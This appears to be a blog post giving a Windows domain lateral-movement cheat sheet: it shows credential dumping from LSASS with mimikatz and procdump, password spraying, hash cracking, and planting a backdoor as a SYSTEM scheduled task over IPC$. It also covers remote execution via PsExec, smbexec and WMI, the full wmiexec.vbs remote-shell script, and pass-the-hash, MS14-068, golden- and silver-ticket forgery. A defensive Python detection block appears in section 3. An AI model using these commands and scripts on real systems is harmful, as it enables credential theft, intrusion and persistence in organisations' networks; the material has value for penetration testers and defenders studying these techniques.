Domain Lateral Movement

1. Prerequisites

The domain techniques below can also be tried in a workgroup environment: replace the DOMAIN/username form with ./username or plain username, and where a tool takes a dedicated domain parameter, fill in workgroup.

Windows Server 2012 and later disable WDigest by default, and earlier versions with a patch such as KB2871997 installed (after which NTLM pass-the-hash works only with administrator accounts) likewise yield only the password hash.

Enable WDigest:

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

2. Information gathering

Commands

net time /domain - query the domain's full name (an "access denied" error means a domain exists but you are not logged in as a domain user)

net user - list local (workgroup) users

net user /domain - list domain users

net group "Domain Admins" /domain - list domain administrators

net group "Domain Controllers" /domain - list domain controllers

whoami /user - show the current user's SID (the domain SID is the user SID with its final hyphen-separated component, the RID, removed)

for /L %1 in (1,1,254) DO @ping -w 1 -n 1 192.168.128.%1 | findstr "TTL=" - live host discovery

ping domain.com - resolve the domain controller's IP

mimikatz

https://github.com/ParrotSec/mimikatz

Run as administrator to collect credentials:

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full

Cobalt Strike (CS)

After escalating privileges: right-click -> Execute -> Run Mimikatz (collect credentials)

View -> Credentials

Right-click -> Targets -> Port Scan (scan IPs and ports)

View -> Targets

procdump (official Microsoft Sysinternals tool) with mimikatz

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

Run as administrator to dump LSASS memory, then extract credentials from the dump with mimikatz:

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

Password spraying

atexec, https://github.com/maaaaz/impacket-examples-windows

Combined with a batch script for brute forcing; when the IP or computer name is correct, the command executes:

FOR /F %%i in (host_list.txt) do atexec.exe -hashes :NTLM_hash DOMAIN/username@%%i "ipconfig"
pause
FOR /F %%i in (host_list.txt) do atexec.exe DOMAIN/username:plaintext_password@%%i "ipconfig"
pause

Hash cracking

From Windows Vista and Windows Server 2003 onward, the stored password hash is NTLM.

hashcat, https://hashcat.net/hashcat/

hashcat.exe -a 0 -m 1000 NTLM_hash wordlist_path --force - -a 0 is a dictionary attack, -m 1000 is NTLM, --force forces the run

hashcat.exe -a 0 -m 1000 NTLM_hash wordlist_path --show - show the results

3. IPC$ and scheduled tasks

Create the connection

net use \\IP_or_hostname\ipc$ "plaintext_password" /user:DOMAIN\username

Common error codes when creating the connection

(1) 5: access denied; the account used is probably not an administrator, escalate privileges first
(2) 51: network problem, Windows cannot find the network path
(3) 53: network path not found; possible causes are a wrong IP address, the target being powered off, the target's Lanmanserver service not running, or a firewall in the way
(4) 67: network name not found; the local Lanmanworkstation service is not running, or the target has removed the ipc$ share
(5) 1219: the supplied credentials conflict with an existing credential set, i.e. an IPC$ connection already exists and must be deleted first
(6) 1326: wrong account name or password
(7) 1792: the target's NetLogon service is not running; common when connecting to a domain controller
(8) 2242: the user's password has expired; the target enforces an account policy with periodic password changes

Reasons an IPC$ connection fails
(1) the target system is not NT or later
(2) the target does not have the IPC$ share enabled
(3) the target does not have ports 139/445 open, or they are blocked by a firewall
(4) the command, account name or password was entered incorrectly

Copy in the backdoor -> create a scheduled task (requires administrator rights) -> delete the connection (optional)

copy c:\Users\x\Desktop\shell.exe \\IP_or_hostname\c$
schtasks /create /s IP_or_hostname /ru system /sc minute /mo 1 /tn "mysqlstart" /tr c:\shell.exe
net use \\IP_or_hostname /del
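From the defender's side, two of the steps above leave telemetry worth alerting on: the WDigest registry change from section 1 and the IPC$/C$ share access followed by remote task creation in this section. The Python below is an added example (not part of the original post) that runs both detections over constructed event records; Security event IDs 5140 (network share accessed) and 4698 (scheduled task created) and Sysmon event 13 (registry value set) are real, while the hostnames, accounts and timestamps are made up.

```python
"""Detection logic for two steps discussed above: the WDigest registry change
(section 1) and IPC$/C$ share access followed by remote task creation (section 3).
Event records below are constructed for the example, not real telemetry."""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
# Tail of the registry path from the reg add command in section 1.
WDIGEST_VALUE = r"\Control\SecurityProviders\WDigest\UseLogonCredential"

# (timestamp, event_id, fields): Sysmon 13 = registry value set,
# Security 5140 = network share accessed, Security 4698 = scheduled task created.
EVENTS = [
    ("2022-12-06T16:30:00", 13,   {"Computer": "WS01", "TargetObject": r"HKLM\SYSTEM\CurrentControlSet" + WDIGEST_VALUE, "Details": "DWORD (0x00000001)"}),
    ("2022-12-06T16:31:00", 5140, {"Computer": "SRV01", "SubjectUserName": "alice", "IpAddress": "192.168.128.10", "ShareName": r"\\*\IPC$"}),
    ("2022-12-06T16:31:05", 5140, {"Computer": "SRV01", "SubjectUserName": "alice", "IpAddress": "192.168.128.10", "ShareName": r"\\*\C$"}),
    ("2022-12-06T16:31:20", 4698, {"Computer": "SRV01", "SubjectUserName": "alice", "TaskName": r"\mysqlstart"}),
    ("2022-12-06T16:45:00", 5140, {"Computer": "SRV02", "SubjectUserName": "bob", "IpAddress": "192.168.128.20", "ShareName": r"\\*\IPC$"}),
    ("2022-12-06T17:30:00", 4698, {"Computer": "SRV02", "SubjectUserName": "bob", "TaskName": r"\Backup"}),  # 45 min later: outside the window
]


def detect_wdigest_enabled(events):
    """Hosts where UseLogonCredential was set to 1 (plaintext credentials back in LSASS)."""
    return [f["Computer"] for _, eid, f in events
            if eid == 13 and f.get("TargetObject", "").endswith(WDIGEST_VALUE)
            and "0x00000001" in f.get("Details", "")]


def detect_share_then_task(events, window=WINDOW):
    """Same account on the same host: admin share (IPC$/C$) access, then a
    scheduled task created within `window`. Returns (host, account, task)."""
    first_share = {}   # (Computer, SubjectUserName) -> time of first admin-share access
    hits = []
    for ts, eid, f in sorted(events, key=lambda e: e[0]):
        key, t = (f.get("Computer"), f.get("SubjectUserName")), datetime.fromisoformat(ts)
        if eid == 5140 and f["ShareName"].upper().endswith(("IPC$", "C$")):
            first_share.setdefault(key, t)
        elif eid == 4698 and key in first_share and t - first_share[key] <= window:
            hits.append((key[0], key[1], f["TaskName"]))
    return hits


if __name__ == "__main__":
    for h in detect_wdigest_enabled(EVENTS):
        print(f"[WDigest] UseLogonCredential=1 set on {h}")
    for host, user, task in detect_share_then_task(EVENTS):
        print(f"[IPC$ -> schtasks] {user} on {host} created task {task} shortly after admin-share access")
```

Correlating on (host, account) rather than source IP is deliberate: event 4698 carries the subject account but no client address, whereas 5140 carries both.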

4. Hash and plaintext passing

atexec

https://github.com/maaaaz/impacket-examples-windows

atexec.exe -hashes :NTLM_hash DOMAIN/username@IP_or_hostname "command"
atexec.exe DOMAIN/username:plaintext_password@IP_or_hostname "command"

PsExec (official Microsoft Sysinternals tool)

https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

Open the remote host's cmd directly as SYSTEM:

PsExec.exe \\IP_or_hostname -u DOMAIN/username -p plaintext_password -s cmd

Alternatively, create the IPC$ connection first, then open the remote cmd as SYSTEM:

net use \\IP_or_hostname\ipc$ "plaintext_password" /user:DOMAIN\username
PsExec.exe \\IP_or_hostname -s cmd

psexec (impacket; supports pass-the-hash)

https://github.com/maaaaz/impacket-examples-windows

Open the remote cmd as SYSTEM:

psexec.exe -hashes :NTLM_hash DOMAIN/username@IP_or_hostname
psexec.exe DOMAIN/username:plaintext_password@IP_or_hostname

CS

Right-click the target -> Jump -> psexec

Choose the credential; for the listener use Beacon SMB (bind connection)

smbexec (impacket)

https://github.com/maaaaz/impacket-examples-windows

Open the remote cmd as SYSTEM:

smbexec.exe -hashes :NTLM_hash DOMAIN/username@IP_or_hostname
smbexec.exe DOMAIN/username:plaintext_password@IP_or_hostname

wmic (official Windows program)

Client for the WMI service (port 135); supports plaintext credentials and does not leave traces, but returns no output.

wmic /node:IP_or_hostname /user:DOMAIN\username /password:plaintext_password process call create "cmd.exe /c whoami >c:\1.txt"

Use the wmiexec.vbs script to get a cmd shell back:

cscript //nologo wmiexec.vbs /shell IP_or_hostname DOMAIN\username plaintext_password

wmiexec.vbs source (v1.1dev, by Twi1ight):

On Error Resume Next
'################################ Temp Result File , Change it to where you like
Const Path = "C:\"
Const FileName = "wmi.dll"
Const timeOut = 1200
'################################
file = Path & "\" & FileName
file = Replace(file,"\\","\")
Set fso = CreateObject("Scripting.FileSystemObject")
FilePath = fso.GetParentFolderName(file) 'for wmi create share
'WScript.Echo FilePath

WAITTIME = timeOut              'ms  time to execute command ,read result file after 1200ms

Set objArgs = WScript.Arguments
intArgCount = objArgs.Count
If intArgCount < 2 Or intArgCount > 5 Then
    WScript.Echo
    WScript.Echo "   $$\      $$\ $$\      $$\ $$$$$$\ $$$$$$$$\ $$\   $$\ $$$$$$$$\  $$$$$$\  "
    WScript.Echo "   $$ | $\  $$ |$$$\    $$$ |\_$$  _|$$  _____|$$ |  $$ |$$  _____|$$  __$$\ "
    WScript.Echo "   $$ |$$$\ $$ |$$$$\  $$$$ |  $$ |  $$ |      \$$\ $$  |$$ |      $$ /  \__|"
    WScript.Echo "   $$ $$ $$\$$ |$$\$$\$$ $$ |  $$ |  $$$$$\     \$$$$  / $$$$$\    $$ |      "
    WScript.Echo "   $$$$  _$$$$ |$$ \$$$  $$ |  $$ |  $$  __|    $$  $$<  $$  __|   $$ |      "
    WScript.Echo "   $$$  / \$$$ |$$ |\$  /$$ |  $$ |  $$ |      $$  /\$$\ $$ |      $$ |  $$\ "
    WScript.Echo "   $$  /   \$$ |$$ | \_/ $$ |$$$$$$\ $$$$$$$$\ $$ /  $$ |$$$$$$$$\ \$$$$$$  |"
    WScript.Echo "   \__/     \__|\__|     \__|\______|\________|\__|  \__|\________| \______/ "
    WScript.Echo "                                               v1.1dev        By. Twi1ight   "
    WScript.Echo " Usage:" & _
                    vbTab & "wmiexec.vbs  /shell  host" & _
        vbNewLine & vbTab & "wmiexec.vbs  /shell  host  user  pass" & _
        vbNewLine & vbTab & "wmiexec.vbs  /cmd  host  command" & _
        vbNewLine & vbTab & "wmiexec.vbs  /cmd  host  user  pass  command" & vbNewLine & _
        vbNewLine & vbTab & "  /shell"  & vbTab & "half-interactive shell mode" & _
        vbNewLine & vbTab & "  /cmd" & vbTab & vbTab & "single command mode" & _
        vbNewLine & vbTab & "  host" & vbTab & vbTab & "hostname or IP address" & _
        vbNewLine & vbTab & "  command" & vbTab & "the command to execute on remote host" & _
        vbNewLine & vbNewLine & vbTab & "  -waitTIME" & vbTab & _
         "[both mode] ,delay TIME to read result,"& vbNewLine & vbTab & _
         vbTab & vbTab &"eg. 'systeminfo -wait5000' 'ping google.com -wait2000'" & _
        vbNewLine & vbTab & "  -persist" & vbTab & _
         "[both mode] ,running command background and persistent" & vbNewLine & vbTab & _
         vbTab & vbTab &"such as nc.exe or Trojan"
    WScript.Quit()
End If

If LCase(objArgs.Item(0)) <> "/cmd" And LCase(objArgs.Item(0)) <> "/shell" Then
    WScript.Echo "WMIEXEC ERROR: Wrong Mode Specified!"
    WScript.Quit
End If
boolShellMode = True
If LCase(objArgs.Item(0)) = "/cmd" Then boolShellMode = False
If boolShellMode = False Then command = objArgs.Item(intArgCount - 1)

host = objArgs.Item(1)
If intArgCount > 3 Then
    user = objArgs.Item(2)
    pass = objArgs.Item(3)
    Set objShell = CreateObject("WScript.Shell")
    strNetUse = "cmd.exe /c net use \\" & host & " """ & pass & """ " & "/user:" & user
    'WScript.Echo strNetUse
    objShell.Run strNetUse,0
End If
'Output Status
WScript.Echo "WMIEXEC : Target -> " & host
WScript.Echo "WMIEXEC : Connecting..."

Set objLocator = CreateObject("wbemscripting.swbemlocator")
If intArgCount > 2 Then
    Set objWMIService = objLocator.ConnectServer(host,"root/cimv2",user,pass)
Else
    Set objWMIService = objLocator.ConnectServer(host,"root/cimv2")
End If
If Err.Number <> 0 Then
    WScript.Echo "WMIEXEC ERROR: " & Err.Description
    WScript.Quit
End If
WScript.Echo "WMIEXEC : Login -> OK"
WScript.Echo "WMIEXEC : Result File -> " & file

boolPersist = False
'Create Share
CreateShare()
CurrentFolder = Null
'-----single Command mode------
If boolShellMode = False Then
    WAITTIME = 5000
    WScript.Echo vbNewLine & vbTab & host & " >> " & command
    boolGetFolder = False
    strResult = PhraseCmd( command )
    'WScript.Echo strResult
    If strResult = "persist" Then
        boolPersist = True
        Exec command, "nul"
    Else
        Exec command, file
        ReadResult()
    End If
    If intArgCount > 3 Then
        Set objShell = CreateObject("WScript.Shell")
        strNetUse = "cmd.exe /c net use \\" & host & " /del"
        objShell.Run strNetUse, 0
    End If
    DeleteShare()
    WScript.Quit
End If
'------------------------------

'++++++++shell mode++++++++++++
'get current working directory
boolGetFolder = True
CurrentFolder = Exec("cd", file)

'WScript.Echo CurrentFolder
Do While True
    boolPersist = False
    WAITTIME = timeOut
    WScript.StdOut.Write(CurrentFolder & ">")
    command = WScript.StdIn.ReadLine
    'press 'Enter' directly
    Do While command = ""
        WScript.StdOut.Write(CurrentFolder & ">")
        command = WScript.StdIn.ReadLine
    Loop
    If LCase(Trim(command)) = "exit" Then Exit Do
    'If Not IsEmpty(command) Then
    'process 'cd' command-------->>>>
    strResult = PhraseCmd( command )
    If strResult = "cd" Then
        command = command & " & cd "
        boolGetFolder = True
        DestFolder = Exec(command, file)
        If CurrentFolder = DestFolder Then
            WScript.Echo "The system cannot find the path specified."
        Else
            CurrentFolder = DestFolder
        End If
    ElseIf strResult = "persist" Then
        boolPersist = True
        'WScript.Echo "persist"
        Exec command,"nul"
        '##########################################toDo
    '-----------<<<<
    Else
        On Error Resume Next
        Err.Clear
        Exec command, file
        ReadResult()
        If Err.Number <> 0 Then WScript.Echo( "WMIEXEC ERROR: " & Err.Number & " " & Err.Description)
        Err.Clear
        On Error Goto 0
    End If
Loop

strDelFile = "del " & file & " /F"
Exec strDelFile, "nul"
If intArgCount > 3 Then
    Set objShell = CreateObject("WScript.Shell")
    strNetUse = "cmd.exe /c net use \\" & host & " /del"
    objShell.Run strNetUse, 0
End If
DeleteShare()

'#####################################
Function PhraseCmd(cmd)
    PhraseCmd = False ' not 'cd'
    arrCommand = Split(cmd)
    strExe = arrCommand(0)
    If LCase(Trim(strExe)) = "cd" Or LCase(Trim(strExe)) = "cd.exe" Then PhraseCmd = "cd" ' is 'cd'
    Set regEx = New RegExp
    regEx.Pattern = "^[a-z]:$"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then PhraseCmd = "cd" ' is 'd:'
    'phrase time command
    regEx.Pattern = "(.*?)-wait(\d+)"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then
        Set objMatch = Matches(0)
        command = objMatch.SubMatches(0)
        'WScript.Echo "Command :" & command
        WAITTIME = CInt(objMatch.SubMatches(1))
        WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
    End If
    'phrase persist command
    regEx.Pattern = "(.*?)-persist"
    regEx.IgnoreCase = True
    Set Matches = regEx.Execute(cmd)
    If Matches.Count <> 0 Then
        Set objMatch = Matches(0)
        command = objMatch.SubMatches(0)
        PhraseCmd = "persist" ' is quiet
    End If
End Function

Function CreateShare()
    'create share
    Set objNewShare = objWMIService.Get("Win32_Share")
    intReturn = objNewShare.Create _
        (FilePath, "WMI_SHARE", 0, 25, "")
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 9
                WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
            Case 22
                WScript.Echo "WMIEXEC ERROR: Share Name Already In Use!"
            Case 24
                WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
        End Select
        If intReturn <> 22 Then WScript.Quit
    Else
        WScript.Echo "WMIEXEC : Share created success."
        WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
        WScript.Echo "WMIEXEC : Share Path -> " & FilePath
    End If
End Function

Function DeleteShare()
    Set colShares = objWMIService.ExecQuery _
        ("Select * from Win32_Share Where Name = 'WMI_SHARE'")
    For Each objShare In colShares
        intReturn = objShare.Delete
    Next
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 25
                WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
        End Select
    Else
        WScript.Echo "WMIEXEC : Share deleted success."
    End If
End Function

Function Exec(cmd, file)
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = 12

    Set objProcess = objWMIService.Get("Win32_Process")
    strExec = "cmd.exe /c " & cmd & " > " & file & " 2>&1"  '2>&1 err

    If boolPersist Then
        strExec = cmd
        intPath = InStr(cmd,"\")
        If intPath = 0 Then strExec = CurrentFolder & "\" & strExec
    End If
    'WScript.Echo strExec
    intReturn = objProcess.Create _
        (strExec, CurrentFolder, objConfig, intProcessID)
    'Add CurrentFolder (strExec, Null, objConfig, intProcessID)
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Process could not be created." & _
            vbNewLine & "WMIEXEC ERROR: Command -> " & cmd & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 3
                WScript.Echo "WMIEXEC ERROR: Insufficient Privilege!"
            Case 9
                WScript.Echo "WMIEXEC ERROR: Path Not Found!"
        End Select
    Else
        ' WScript.Echo "Process created." & _
        '     vbNewLine & "Command: " & cmd & _
        '     vbNewLine & "Process ID: " & intProcessID
        If boolPersist Then WScript.Echo "WMIEXEC : Process created. PID: "& intProcessID
        If boolGetFolder = True Then
            boolGetFolder = False
            Exec = GetCurrentFolder()
            Exit Function
        End If
        'ReadResult()
    End If
End Function

Function ReadResult()
    WScript.Sleep(WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
    objFile.Close
    WScript.Echo strContents
    'fso.DeleteFile(UNCFilePath) win2008 fso has no privilege to delete file on share folder
    strDelFile = "del " & file & " /F"
    Exec strDelFile, "nul"
End Function

Function GetCurrentFolder()
    WScript.Sleep(WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    GetCurrentFolder = objFile.ReadLine
    objFile.Close
    strDelFile = "del " & file & " /F"
    Exec strDelFile, "nul"
End Function

wmiexec (impacket; supports pass-the-hash)

https://github.com/maaaaz/impacket-examples-windows

wmiexec.exe -hashes :NTLM_hash DOMAIN/username@IP_or_hostname "command"
wmiexec.exe DOMAIN/username:plaintext_password@IP_or_hostname "command"

5. PTH (pass-the-hash)

Run mimikatz as administrator to open a cmd holding the user's credentials (for a workgroup, use workgroup as the domain):

mimikatz.exe
privilege::debug
sekurlsa::pth /user:username /domain:domain.com /ntlm:NTLM_hash
dir \\IP_or_hostname\c$

6. PTK (pass-the-key)

When the patch is installed and NTLM passing works only with administrator accounts, try passing the AES256 key instead.

Run mimikatz as administrator to collect the AES256 key and open a cmd holding the user's credentials:

mimikatz.exe
privilege::debug
sekurlsa::ekeys
sekurlsa::pth /user:username /domain:domain.com /aes256:AES256_key
dir \\IP_or_hostname\c$

7. PTT (pass-the-ticket)

Passing a TGT ticket, based on the Kerberos protocol

MS14-068.exe with mimikatz

https://github.com/ianxtianxt/MS14-068

Generate the ticket file -> import it with mimikatz (no administrator rights needed) -> list tickets -> purge tickets (optional)

MS14-068.exe -u username@domain.com -s user_SID -d IP_or_hostname -p plaintext_password
mimikatz.exe
kerberos::ptc ticket_file
exit
klist
dir \\IP_or_hostname\c$
klist purge

kekeo with mimikatz

https://github.com/gentilkiwi/kekeo

Generate the ticket file -> import it with mimikatz (no administrator rights needed)

kekeo.exe "tgt::ask /user:username /domain:domain.com /ntlm:NTLM_hash"
mimikatz.exe
kerberos::ptc ticket_file

Using local tickets

After an administrator has connected, a ticket stays cached for 10 hours

Run mimikatz as administrator to export the local tickets -> import a ticket (no administrator rights needed)

mimikatz.exe
privilege::debug
sekurlsa::tickets /export
kerberos::ptt ticket_file

Golden ticket

Forge a TGT using the krbtgt account

Run mimikatz as administrator to get the krbtgt NTLM hash -> generate the ticket file -> import it (no administrator rights needed)

mimikatz.exe
privilege::debug
lsadump::dcsync /domain:domain.com /user:krbtgt
kerberos::golden /admin:admin_username /domain:domain.com /sid:domain_SID /krbtgt:krbtgt_NTLM_hash
kerberos::ptt ticket_file

Silver ticket

Forge a TGS; it only grants access to the specified service

First collect credentials with mimikatz to obtain the service account's NTLM hash

kerberos::golden /user:any_username /domain:domain.com /sid:domain_SID /target:target_FQDN(e.g. dc.lk.com) /rc4:service_NTLM_hash /service:cifs /ptt
kerberos::ptt ticket_file


Posted 2022-12-06 16:33 by Hacker&Cat